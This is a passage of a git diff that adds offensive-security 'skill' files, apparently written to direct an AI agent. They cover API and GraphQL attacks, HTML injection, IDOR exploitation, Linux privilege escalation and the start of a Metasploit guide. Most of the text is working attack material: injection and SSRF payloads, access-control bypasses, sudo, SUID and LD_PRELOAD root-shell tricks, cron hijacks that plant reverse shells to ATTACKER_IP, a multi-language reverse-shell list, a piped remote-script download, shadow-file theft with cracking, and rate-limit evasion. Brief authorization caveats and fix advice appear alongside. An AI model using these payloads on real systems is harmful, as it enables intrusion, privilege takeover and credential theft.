JSON/XML/URL | Defined endpoints | +| GraphQL | HTTP | Custom Query | Single endpoint | + +--- + +## Core Workflow + +### Step 1: API Reconnaissance + +Identify API type and enumerate endpoints: + +```bash +# Check for Swagger/OpenAPI documentation +/swagger.json +/openapi.json +/api-docs +/v1/api-docs +/swagger-ui.html + +# Use Kiterunner for API discovery +kr scan https://target.com -w routes-large.kite + +# Extract paths from Swagger +python3 json2paths.py swagger.json +``` + +### Step 2: Authentication Testing + +```bash +# Test different login paths +/api/mobile/login +/api/v3/login +/api/magic_link +/api/admin/login + +# Check rate limiting on auth endpoints +# If no rate limit → brute force possible + +# Test mobile vs web API separately +# Don't assume same security controls +``` + +### Step 3: IDOR Testing + +Insecure Direct Object Reference is the most common API vulnerability: + +```bash +# Basic IDOR +GET /api/users/1234 → GET /api/users/1235 + +# Even if ID is email-based, try numeric +/?user_id=111 instead of /?user_id=user@mail.com + +# Test /me/orders vs /user/654321/orders +``` + +**IDOR Bypass Techniques:** + +```bash +# Wrap ID in array +{"id":111} → {"id":[111]} + +# JSON wrap +{"id":111} → {"id":{"id":111}} + +# Send ID twice +URL?id=&id= + +# Wildcard injection +{"user_id":"*"} + +# Parameter pollution +/api/get_profile?user_id=&user_id= +{"user_id":,"user_id":} +``` + +### Step 4: Injection Testing + +**SQL Injection in JSON:** + +```json +{"id":"56456"} → OK +{"id":"56456 AND 1=1#"} → OK +{"id":"56456 AND 1=2#"} → OK +{"id":"56456 AND 1=3#"} → ERROR (vulnerable!) +{"id":"56456 AND sleep(15)#"} → SLEEP 15 SEC +``` + +**Command Injection:** + +```bash +# Ruby on Rails +?url=Kernel#open → ?url=|ls + +# Linux command injection +api.url.com/endpoint?name=file.txt;ls%20/ +``` + +**XXE Injection:** + +```xml + ]> +``` + +**SSRF via API:** + +```html + + +``` + +**.NET Path.Combine Vulnerability:** + +```bash +# If .NET app uses Path.Combine(path_1, path_2) +# Test for path traversal +https://example.org/download?filename=a.png +https://example.org/download?filename=C:\inetpub\wwwroot\web.config +https://example.org/download?filename=\\smb.dns.attacker.com\a.png +``` + +### Step 5: Method Testing + +```bash +# Test all HTTP methods +GET /api/v1/users/1 +POST /api/v1/users/1 +PUT /api/v1/users/1 +DELETE /api/v1/users/1 +PATCH /api/v1/users/1 + +# Switch content type +Content-Type: application/json → application/xml +``` + +--- + +## GraphQL-Specific Testing + +### Introspection Query + +Fetch entire backend schema: + +```graphql +{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}} +``` + +**URL-encoded version:** + +``` +/graphql?query={__schema{types{name,kind,description,fields{name}}}} +``` + +### GraphQL IDOR + +```graphql +# Try accessing other user IDs +query { + user(id: "OTHER_USER_ID") { + email + password + creditCard + } +} +``` + +### GraphQL SQL/NoSQL Injection + +```graphql +mutation { + login(input: { + email: "test' or 1=1--" + password: "password" + }) { + success + jwt + } +} +``` + +### Rate Limit Bypass (Batching) + +```graphql +mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}} +mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}} +mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}} +``` + +### GraphQL DoS (Nested Queries) + +```graphql +query { + posts { + comments { + user { + posts { + comments { + user { + posts { ... } + } + } + } + } + } + } +} +``` + +### GraphQL XSS + +```bash +# XSS via GraphQL endpoint +http://target.com/graphql?query={user(name:""){id}} + +# URL-encoded XSS +http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E +``` + +### GraphQL Tools + +| Tool | Purpose | +|------|---------| +| GraphCrawler | Schema discovery | +| graphw00f | Fingerprinting | +| clairvoyance | Schema reconstruction | +| InQL | Burp extension | +| GraphQLmap | Exploitation | + +--- + +## Endpoint Bypass Techniques + +When receiving 403/401, try these bypasses: + +```bash +# Original blocked request +/api/v1/users/sensitivedata → 403 + +# Bypass attempts +/api/v1/users/sensitivedata.json +/api/v1/users/sensitivedata? +/api/v1/users/sensitivedata/ +/api/v1/users/sensitivedata?? +/api/v1/users/sensitivedata%20 +/api/v1/users/sensitivedata%09 +/api/v1/users/sensitivedata# +/api/v1/users/sensitivedata&details +/api/v1/users/..;/sensitivedata +``` + +--- + +## Output Exploitation + +### PDF Export Attacks + +```html + + + + + +``` + +### Phase 8: Bypass Techniques + +Evade basic filters: + +```html + +

Test

+ + + +<h1>Encoded</h1> +%3Ch1%3EURL%20Encoded%3C%2Fh1%3E + + +Split Tag + + +Null Byte + + +%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E + + +\u003ch1\u003eUnicode\u003c/h1\u003e + + +
Hover me
+ +``` + +### Phase 9: Automated Testing + +#### Using Burp Suite + +``` +1. Capture request with potential injection point +2. Send to Intruder +3. Mark parameter value as payload position +4. Load HTML injection wordlist +5. Start attack +6. Filter responses for rendered HTML +7. Manually verify successful injections +``` + +#### Using OWASP ZAP + +``` +1. Spider the target application +2. Active Scan with HTML injection rules +3. Review Alerts for injection findings +4. Validate findings manually +``` + +#### Custom Fuzzing Script + +```python +#!/usr/bin/env python3 +import requests +import urllib.parse + +target = "http://target.com/search" +param = "q" + +payloads = [ + "

Test

", + "Bold", + "", + "", + "Click", + "
Styled
", + "Moving", + "", +] + +for payload in payloads: + encoded = urllib.parse.quote(payload) + url = f"{target}?{param}={encoded}" + + try: + response = requests.get(url, timeout=5) + if payload.lower() in response.text.lower(): + print(f"[+] Possible injection: {payload}") + elif "

" in response.text or "" in response.text: + print(f"[?] Partial reflection: {payload}") + except Exception as e: + print(f"[-] Error: {e}") +``` + +### Phase 10: Prevention and Remediation + +Secure coding practices: + +```php +// PHP: Escape output +echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8'); + +// PHP: Strip tags +echo strip_tags($user_input); + +// PHP: Allow specific tags only +echo strip_tags($user_input, '

'); +``` + +```python +# Python: HTML escape +from html import escape +safe_output = escape(user_input) + +# Python Flask: Auto-escaping +{{ user_input }} # Jinja2 escapes by default +{{ user_input | safe }} # Marks as safe (dangerous!) +``` + +```javascript +// JavaScript: Text content (safe) +element.textContent = userInput; + +// JavaScript: innerHTML (dangerous!) +element.innerHTML = userInput; // Vulnerable! + +// JavaScript: Sanitize +const clean = DOMPurify.sanitize(userInput); +element.innerHTML = clean; +``` + +Server-side protections: +- Input validation (whitelist allowed characters) +- Output encoding (context-aware escaping) +- Content Security Policy (CSP) headers +- Web Application Firewall (WAF) rules + +## Quick Reference + +### Common Test Payloads + +| Payload | Purpose | +|---------|---------| +| `

Test

` | Basic rendering test | +| `Bold` | Simple formatting | +| `Link` | Link injection | +| `` | Image tag test | +| `
` | Style injection | +| `
` | Form hijacking | + +### Injection Contexts + +| Context | Test Approach | +|---------|---------------| +| URL parameter | `?param=

test

` | +| Form field | POST with HTML payload | +| Cookie value | Inject via document.cookie | +| HTTP header | Inject in Referer/User-Agent | +| File upload | HTML file with malicious content | + +### Encoding Types + +| Type | Example | +|------|---------| +| URL encoding | `%3Ch1%3E` = `

` | +| HTML entities | `<h1>` = `

` | +| Double encoding | `%253C` = `<` | +| Unicode | `\u003c` = `<` | + +## Constraints and Limitations + +### Attack Limitations +- Modern browsers may sanitize some injections +- CSP can prevent inline styles and scripts +- WAFs may block common payloads +- Some applications escape output properly + +### Testing Considerations +- Distinguish between HTML injection and XSS +- Verify visual impact in browser +- Test in multiple browsers +- Check for stored vs reflected + +### Severity Assessment +- Lower severity than XSS (no script execution) +- Higher impact when combined with phishing +- Consider defacement/reputation damage +- Evaluate credential theft potential + +## Troubleshooting + +| Issue | Solutions | +|-------|-----------| +| HTML not rendering | Check if output HTML-encoded; try encoding variations; verify HTML context | +| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags | +| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects | diff --git a/skills/idor-testing/SKILL.md b/skills/idor-testing/SKILL.md new file mode 100644 index 00000000..13c354ed --- /dev/null +++ b/skills/idor-testing/SKILL.md @@ -0,0 +1,439 @@ +--- +name: IDOR Vulnerability Testing +description: This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications. +--- + +# IDOR Vulnerability Testing + +## Purpose + +Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access. + +## Inputs / Prerequisites + +- **Target Web Application**: URL of application with user-specific resources +- **Multiple User Accounts**: At least two test accounts to verify cross-user access +- **Burp Suite or Proxy Tool**: Intercepting proxy for request manipulation +- **Authorization**: Written permission for security testing +- **Understanding of Application Flow**: Knowledge of how objects are referenced (IDs, filenames) + +## Outputs / Deliverables + +- **IDOR Vulnerability Report**: Documentation of discovered access control bypasses +- **Proof of Concept**: Evidence of unauthorized data access across user contexts +- **Affected Endpoints**: List of vulnerable API endpoints and parameters +- **Impact Assessment**: Classification of data exposure severity +- **Remediation Recommendations**: Specific fixes for identified vulnerabilities + +## Core Workflow + +### 1. Understand IDOR Vulnerability Types + +#### Direct Reference to Database Objects +Occurs when applications reference database records via user-controllable parameters: +``` +# Original URL (authenticated as User A) +example.com/user/profile?id=2023 + +# Manipulation attempt (accessing User B's data) +example.com/user/profile?id=2022 +``` + +#### Direct Reference to Static Files +Occurs when applications expose file paths or names that can be enumerated: +``` +# Original URL (User A's receipt) +example.com/static/receipt/205.pdf + +# Manipulation attempt (User B's receipt) +example.com/static/receipt/200.pdf +``` + +### 2. Reconnaissance and Setup + +#### Create Multiple Test Accounts +``` +Account 1: "attacker" - Primary testing account +Account 2: "victim" - Account whose data we attempt to access +``` + +#### Identify Object References +Capture and analyze requests containing: +- Numeric IDs in URLs: `/api/user/123` +- Numeric IDs in parameters: `?id=123&action=view` +- Numeric IDs in request body: `{"userId": 123}` +- File paths: `/download/receipt_123.pdf` +- GUIDs/UUIDs: `/profile/a1b2c3d4-e5f6-...` + +#### Map User IDs +``` +# Access user ID endpoint (if available) +GET /api/user-id/ + +# Note ID patterns: +# - Sequential integers (1, 2, 3...) +# - Auto-incremented values +# - Predictable patterns +``` + +### 3. Detection Techniques + +#### URL Parameter Manipulation +``` +# Step 1: Capture original authenticated request +GET /api/user/profile?id=1001 HTTP/1.1 +Cookie: session=attacker_session + +# Step 2: Modify ID to target another user +GET /api/user/profile?id=1000 HTTP/1.1 +Cookie: session=attacker_session + +# Vulnerable if: Returns victim's data with attacker's session +``` + +#### Request Body Manipulation +``` +# Original POST request +POST /api/address/update HTTP/1.1 +Content-Type: application/json +Cookie: session=attacker_session + +{"id": 5, "userId": 1001, "address": "123 Attacker St"} + +# Modified request targeting victim +{"id": 5, "userId": 1000, "address": "123 Attacker St"} +``` + +#### HTTP Method Switching +``` +# Original GET request may be protected +GET /api/admin/users/1000 → 403 Forbidden + +# Try alternative methods +POST /api/admin/users/1000 → 200 OK (Vulnerable!) +PUT /api/admin/users/1000 → 200 OK (Vulnerable!) +``` + +### 4. Exploitation with Burp Suite + +#### Manual Exploitation +``` +1. Configure browser proxy through Burp Suite +2. Login as "attacker" user +3. Navigate to profile/data page +4. Enable Intercept in Proxy tab +5. Capture request with user ID +6. Modify ID to victim's ID +7. Forward request +8. Observe response for victim's data +``` + +#### Automated Enumeration with Intruder +``` +1. Send request to Intruder (Ctrl+I) +2. Clear all payload positions +3. Select ID parameter as payload position +4. Configure attack type: Sniper +5. Payload settings: + - Type: Numbers + - Range: 1 to 10000 + - Step: 1 +6. Start attack +7. Analyze responses for 200 status codes +``` + +#### Battering Ram Attack for Multiple Positions +``` +# When same ID appears in multiple locations +PUT /api/addresses/§5§/update HTTP/1.1 + +{"id": §5§, "userId": 3} + +Attack Type: Battering Ram +Payload: Numbers 1-1000 +``` + +### 5. Common IDOR Locations + +#### API Endpoints +``` +/api/user/{id} +/api/profile/{id} +/api/order/{id} +/api/invoice/{id} +/api/document/{id} +/api/message/{id} +/api/address/{id}/update +/api/address/{id}/delete +``` + +#### File Downloads +``` +/download/invoice_{id}.pdf +/static/receipts/{id}.pdf +/uploads/documents/{filename} +/files/reports/report_{date}_{id}.xlsx +``` + +#### Query Parameters +``` +?userId=123 +?orderId=456 +?documentId=789 +?file=report_123.pdf +?account=user@email.com +``` + +## Quick Reference + +### IDOR Testing Checklist + +| Test | Method | Indicator of Vulnerability | +|------|--------|---------------------------| +| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data | +| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources | +| Enumerate Range | Test IDs 1-1000 | Find valid records of other users | +| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors | +| Large Values | Test `id=99999999` | System information disclosure | +| String IDs | Change format `id=user_123` | Logic bypass | +| GUID Manipulation | Modify UUID portions | Predictable UUID patterns | + +### Response Analysis + +| Status Code | Interpretation | +|-------------|----------------| +| 200 OK | Potential IDOR - verify data ownership | +| 403 Forbidden | Access control working | +| 404 Not Found | Resource doesn't exist | +| 401 Unauthorized | Authentication required | +| 500 Error | Potential input validation issue | + +### Common Vulnerable Parameters + +| Parameter Type | Examples | +|----------------|----------| +| User identifiers | `userId`, `uid`, `user_id`, `account` | +| Resource identifiers | `id`, `pid`, `docId`, `fileId` | +| Order/Transaction | `orderId`, `transactionId`, `invoiceId` | +| Message/Communication | `messageId`, `threadId`, `chatId` | +| File references | `filename`, `file`, `document`, `path` | + +## Constraints and Limitations + +### Operational Boundaries +- Requires at least two valid user accounts for verification +- Some applications use session-bound tokens instead of IDs +- GUID/UUID references harder to enumerate but not impossible +- Rate limiting may restrict enumeration attempts +- Some IDOR requires chained vulnerabilities to exploit + +### Detection Challenges +- Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin) +- Blind IDOR where response doesn't confirm access +- Time-based IDOR in asynchronous operations +- IDOR in websocket communications + +### Legal Requirements +- Only test applications with explicit authorization +- Document all testing activities and findings +- Do not access, modify, or exfiltrate real user data +- Report findings through proper disclosure channels + +## Examples + +### Example 1: Basic ID Parameter IDOR +``` +# Login as attacker (userId=1001) +# Navigate to profile page + +# Original request +GET /api/profile?id=1001 HTTP/1.1 +Cookie: session=abc123 + +# Response: Attacker's profile data + +# Modified request (targeting victim userId=1000) +GET /api/profile?id=1000 HTTP/1.1 +Cookie: session=abc123 + +# Vulnerable Response: Victim's profile data returned! +``` + +### Example 2: IDOR in Address Update Endpoint +``` +# Intercept address update request +PUT /api/addresses/5/update HTTP/1.1 +Content-Type: application/json +Cookie: session=attacker_session + +{ + "id": 5, + "userId": 1001, + "street": "123 Main St", + "city": "Test City" +} + +# Modify userId to victim's ID +{ + "id": 5, + "userId": 1000, # Changed from 1001 + "street": "Hacked Address", + "city": "Exploit City" +} + +# If 200 OK: Address created under victim's account +``` + +### Example 3: Static File IDOR +``` +# Download own receipt +GET /api/download/5 HTTP/1.1 +Cookie: session=attacker_session + +# Response: PDF of attacker's receipt (order #5) + +# Attempt to access other receipts +GET /api/download/3 HTTP/1.1 +Cookie: session=attacker_session + +# Vulnerable Response: PDF of victim's receipt (order #3)! +``` + +### Example 4: Burp Intruder Enumeration +``` +# Configure Intruder attack +Target: PUT /api/addresses/§1§/update +Payload Position: Address ID in URL and body + +Attack Configuration: +- Type: Battering Ram +- Payload: Numbers 0-20, Step 1 + +Body Template: +{ + "id": §1§, + "userId": 3 +} + +# Analyze results: +# - 200 responses indicate successful modification +# - Check victim's account for new addresses +``` + +### Example 5: Horizontal to Vertical Escalation +``` +# Step 1: Enumerate user roles +GET /api/user/1 → {"role": "user", "id": 1} +GET /api/user/2 → {"role": "user", "id": 2} +GET /api/user/3 → {"role": "admin", "id": 3} + +# Step 2: Access admin functions with discovered ID +GET /api/admin/dashboard?userId=3 HTTP/1.1 +Cookie: session=regular_user_session + +# If accessible: Vertical privilege escalation achieved +``` + +## Troubleshooting + +### Issue: All Requests Return 403 Forbidden +**Cause**: Server-side access control is implemented +**Solution**: +``` +# Try alternative attack vectors: +1. HTTP method switching (GET → POST → PUT) +2. Add X-Original-URL or X-Rewrite-URL headers +3. Try parameter pollution: ?id=1001&id=1000 +4. URL encoding variations: %31%30%30%30 for "1000" +5. Case variations for string IDs +``` + +### Issue: Application Uses UUIDs Instead of Sequential IDs +**Cause**: Randomized identifiers reduce enumeration risk +**Solution**: +``` +# UUID discovery techniques: +1. Check response bodies for leaked UUIDs +2. Search JavaScript files for hardcoded UUIDs +3. Check API responses that list multiple objects +4. Look for UUID patterns in error messages +5. Try UUID v1 (time-based) prediction if applicable +``` + +### Issue: Session Token Bound to User +**Cause**: Application validates session against requested resource +**Solution**: +``` +# Advanced bypass attempts: +1. Test for IDOR in unauthenticated endpoints +2. Check password reset/email verification flows +3. Look for IDOR in file upload/download +4. Test API versioning: /api/v1/ vs /api/v2/ +5. Check mobile API endpoints (often less protected) +``` + +### Issue: Rate Limiting Blocks Enumeration +**Cause**: Application implements request throttling +**Solution**: +``` +# Bypass techniques: +1. Add delays between requests (Burp Intruder throttle) +2. Rotate IP addresses (proxy chains) +3. Target specific high-value IDs instead of full range +4. Use different endpoints for same resources +5. Test during off-peak hours +``` + +### Issue: Cannot Verify IDOR Impact +**Cause**: Response doesn't clearly indicate data ownership +**Solution**: +``` +# Verification methods: +1. Create unique identifiable data in victim account +2. Look for PII markers (name, email) in responses +3. Compare response lengths between users +4. Check for timing differences in responses +5. Use secondary indicators (creation dates, metadata) +``` + +## Remediation Guidance + +### Implement Proper Access Control +```python +# Django example - validate ownership +def update_address(request, address_id): + address = Address.objects.get(id=address_id) + + # Verify ownership before allowing update + if address.user != request.user: + return HttpResponseForbidden("Unauthorized") + + # Proceed with update + address.update(request.data) +``` + +### Use Indirect References +```python +# Instead of: /api/address/123 +# Use: /api/address/current-user/billing + +def get_address(request): + # Always filter by authenticated user + address = Address.objects.filter(user=request.user).first() + return address +``` + +### Server-Side Validation +```python +# Always validate on server, never trust client input +def download_receipt(request, receipt_id): + receipt = Receipt.objects.filter( + id=receipt_id, + user=request.user # Critical: filter by current user + ).first() + + if not receipt: + return HttpResponseNotFound() + + return FileResponse(receipt.file) +``` diff --git a/skills/linux-privilege-escalation/SKILL.md b/skills/linux-privilege-escalation/SKILL.md new file mode 100644 index 00000000..15b652d6 --- /dev/null +++ b/skills/linux-privilege-escalation/SKILL.md @@ -0,0 +1,501 @@ +--- +name: Linux Privilege Escalation +description: This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". It provides comprehensive techniques for identifying and exploiting privilege escalation paths on Linux systems. +--- + +# Linux Privilege Escalation + +## Purpose + +Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses. + +## Inputs / Prerequisites + +### Required Access +- Low-privilege shell access to target Linux system +- Ability to execute commands (interactive or semi-interactive shell) +- Network access for reverse shell connections (if needed) +- Attacker machine for payload hosting and receiving shells + +### Technical Requirements +- Understanding of Linux filesystem permissions and ownership +- Familiarity with common Linux utilities and scripting +- Knowledge of kernel versions and associated vulnerabilities +- Basic understanding of compilation (gcc) for custom exploits + +### Recommended Tools +- LinPEAS, LinEnum, or Linux Smart Enumeration scripts +- Linux Exploit Suggester (LES) +- GTFOBins reference for binary exploitation +- John the Ripper or Hashcat for password cracking +- Netcat or similar for reverse shells + +## Outputs / Deliverables + +### Primary Outputs +- Root shell access on target system +- Privilege escalation path documentation +- System enumeration findings report +- Recommendations for remediation + +### Evidence Artifacts +- Screenshots of successful privilege escalation +- Command output logs demonstrating root access +- Identified vulnerability details +- Exploited configuration files + +## Core Workflow + +### Phase 1: System Enumeration + +#### Basic System Information +Gather fundamental system details for vulnerability research: + +```bash +# Hostname and system role +hostname + +# Kernel version and architecture +uname -a + +# Detailed kernel information +cat /proc/version + +# Operating system details +cat /etc/issue +cat /etc/*-release + +# Architecture +arch +``` + +#### User and Permission Enumeration + +```bash +# Current user context +whoami +id + +# Users with login shells +cat /etc/passwd | grep -v nologin | grep -v false + +# Users with home directories +cat /etc/passwd | grep home + +# Group memberships +groups + +# Other logged-in users +w +who +``` + +#### Network Information + +```bash +# Network interfaces +ifconfig +ip addr + +# Routing table +ip route + +# Active connections +netstat -antup +ss -tulpn + +# Listening services +netstat -l +``` + +#### Process and Service Enumeration + +```bash +# All running processes +ps aux +ps -ef + +# Process tree view +ps axjf + +# Services running as root +ps aux | grep root +``` + +#### Environment Variables + +```bash +# Full environment +env + +# PATH variable (for hijacking) +echo $PATH +``` + +### Phase 2: Automated Enumeration + +Deploy automated scripts for comprehensive enumeration: + +```bash +# LinPEAS +curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh + +# LinEnum +./LinEnum.sh -t + +# Linux Smart Enumeration +./lse.sh -l 1 + +# Linux Exploit Suggester +./les.sh +``` + +Transfer scripts to target system: + +```bash +# On attacker machine +python3 -m http.server 8000 + +# On target machine +wget http://ATTACKER_IP:8000/linpeas.sh +chmod +x linpeas.sh +./linpeas.sh +``` + +### Phase 3: Kernel Exploits + +#### Identify Kernel Version + +```bash +uname -r +cat /proc/version +``` + +#### Search for Exploits + +```bash +# Use Linux Exploit Suggester +./linux-exploit-suggester.sh + +# Manual search on exploit-db +searchsploit linux kernel [version] +``` + +#### Common Kernel Exploits + +| Kernel Version | Exploit | CVE | +|---------------|---------|-----| +| 2.6.x - 3.x | Dirty COW | CVE-2016-5195 | +| 4.4.x - 4.13.x | Double Fetch | CVE-2017-16995 | +| 5.8+ | Dirty Pipe | CVE-2022-0847 | + +#### Compile and Execute + +```bash +# Transfer exploit source +wget http://ATTACKER_IP/exploit.c + +# Compile on target +gcc exploit.c -o exploit + +# Execute +./exploit +``` + +### Phase 4: Sudo Exploitation + +#### Enumerate Sudo Privileges + +```bash +sudo -l +``` + +#### GTFOBins Sudo Exploitation +Reference https://gtfobins.github.io for exploitation commands: + +```bash +# Example: vim with sudo +sudo vim -c ':!/bin/bash' + +# Example: find with sudo +sudo find . -exec /bin/sh \; -quit + +# Example: awk with sudo +sudo awk 'BEGIN {system("/bin/bash")}' + +# Example: python with sudo +sudo python -c 'import os; os.system("/bin/bash")' + +# Example: less with sudo +sudo less /etc/passwd +!/bin/bash +``` + +#### LD_PRELOAD Exploitation +When env_keep includes LD_PRELOAD: + +```c +// shell.c +#include +#include +#include + +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/bash"); +} +``` + +```bash +# Compile shared library +gcc -fPIC -shared -o shell.so shell.c -nostartfiles + +# Execute with sudo +sudo LD_PRELOAD=/tmp/shell.so find +``` + +### Phase 5: SUID Binary Exploitation + +#### Find SUID Binaries + +```bash +find / -type f -perm -04000 -ls 2>/dev/null +find / -perm -u=s -type f 2>/dev/null +``` + +#### Exploit SUID Binaries +Reference GTFOBins for SUID exploitation: + +```bash +# Example: base64 for file reading +LFILE=/etc/shadow +base64 "$LFILE" | base64 -d + +# Example: cp for file writing +cp /bin/bash /tmp/bash +chmod +s /tmp/bash +/tmp/bash -p + +# Example: find with SUID +find . -exec /bin/sh -p \; -quit +``` + +#### Password Cracking via SUID + +```bash +# Read shadow file (if base64 has SUID) +base64 /etc/shadow | base64 -d > shadow.txt +base64 /etc/passwd | base64 -d > passwd.txt + +# On attacker machine +unshadow passwd.txt shadow.txt > hashes.txt +john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt +``` + +#### Add User to passwd (if nano/vim has SUID) + +```bash +# Generate password hash +openssl passwd -1 -salt new newpassword + +# Add to /etc/passwd (using SUID editor) +newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash +``` + +### Phase 6: Capabilities Exploitation + +#### Enumerate Capabilities + +```bash +getcap -r / 2>/dev/null +``` + +#### Exploit Capabilities + +```bash +# Example: python with cap_setuid +/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' + +# Example: vim with cap_setuid +./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")' + +# Example: perl with cap_setuid +perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' +``` + +### Phase 7: Cron Job Exploitation + +#### Enumerate Cron Jobs + +```bash +# System crontab +cat /etc/crontab + +# User crontabs +ls -la /var/spool/cron/crontabs/ + +# Cron directories +ls -la /etc/cron.* + +# Systemd timers +systemctl list-timers +``` + +#### Exploit Writable Cron Scripts + +```bash +# Identify writable cron script from /etc/crontab +ls -la /opt/backup.sh # Check permissions +echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh + +# If cron references non-existent script in writable PATH +echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh +chmod +x /home/user/antivirus.sh +``` + +### Phase 8: PATH Hijacking + +```bash +# Find SUID binary calling external command +strings /usr/local/bin/suid-binary +# Shows: system("service apache2 start") + +# Hijack by creating malicious binary in writable PATH +export PATH=/tmp:$PATH +echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service +chmod +x /tmp/service +/usr/local/bin/suid-binary # Execute SUID binary +``` + +### Phase 9: NFS Exploitation + +```bash +# On target - look for no_root_squash option +cat /etc/exports + +# On attacker - mount share and create SUID binary +showmount -e TARGET_IP +mount -o rw TARGET_IP:/share /tmp/nfs + +# Create and compile SUID shell +echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c +gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell + +# On target - execute +/share/shell +``` + +## Quick Reference + +### Enumeration Commands Summary +| Purpose | Command | +|---------|---------| +| Kernel version | `uname -a` | +| Current user | `id` | +| Sudo rights | `sudo -l` | +| SUID files | `find / -perm -u=s -type f 2>/dev/null` | +| Capabilities | `getcap -r / 2>/dev/null` | +| Cron jobs | `cat /etc/crontab` | +| Writable dirs | `find / -writable -type d 2>/dev/null` | +| NFS exports | `cat /etc/exports` | + +### Reverse Shell One-Liners +```bash +# Bash +bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 + +# Python +python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])' + +# Netcat +nc -e /bin/bash ATTACKER_IP 4444 + +# Perl +perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");' +``` + +### Key Resources +- GTFOBins: https://gtfobins.github.io +- LinPEAS: https://github.com/carlospolop/PEASS-ng +- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester + +## Constraints and Guardrails + +### Operational Boundaries +- Verify kernel exploits in test environment before production use +- Failed kernel exploits may crash the system +- Document all changes made during privilege escalation +- Maintain access persistence only as authorized + +### Technical Limitations +- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP) +- AppArmor/SELinux may restrict exploitation techniques +- Container environments limit kernel-level exploits +- Hardened systems may have restricted sudo configurations + +### Legal and Ethical Requirements +- Written authorization required before testing +- Stay within defined scope boundaries +- Report critical findings immediately +- Do not access data beyond scope requirements + +## Examples + +### Example 1: Sudo to Root via find + +**Scenario**: User has sudo rights for find command + +```bash +$ sudo -l +User user may run the following commands: + (root) NOPASSWD: /usr/bin/find + +$ sudo find . -exec /bin/bash \; -quit +# id +uid=0(root) gid=0(root) groups=0(root) +``` + +### Example 2: SUID base64 for Shadow Access + +**Scenario**: base64 binary has SUID bit set + +```bash +$ find / -perm -u=s -type f 2>/dev/null | grep base64 +/usr/bin/base64 + +$ base64 /etc/shadow | base64 -d +root:$6$xyz...:18000:0:99999:7::: + +# Crack offline with john +$ john --wordlist=rockyou.txt shadow.txt +``` + +### Example 3: Cron Job Script Hijacking + +**Scenario**: Root cron job executes writable script + +```bash +$ cat /etc/crontab +* * * * * root /opt/scripts/backup.sh + +$ ls -la /opt/scripts/backup.sh +-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh + +$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh + +# Wait 1 minute +$ /tmp/bash -p +# id +uid=1000(user) gid=1000(user) euid=0(root) +``` + +## Troubleshooting + +| Issue | Solutions | +|-------|-----------| +| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` | +| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering | +| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges | +| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab | diff --git a/skills/metasploit-framework/SKILL.md b/skills/metasploit-framework/SKILL.md new file mode 100644 index 00000000..b7c860af --- /dev/null +++ b/skills/metasploit-framework/SKILL.md @@ -0,0 +1,475 @@ +--- +name: Metasploit Framework +description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the 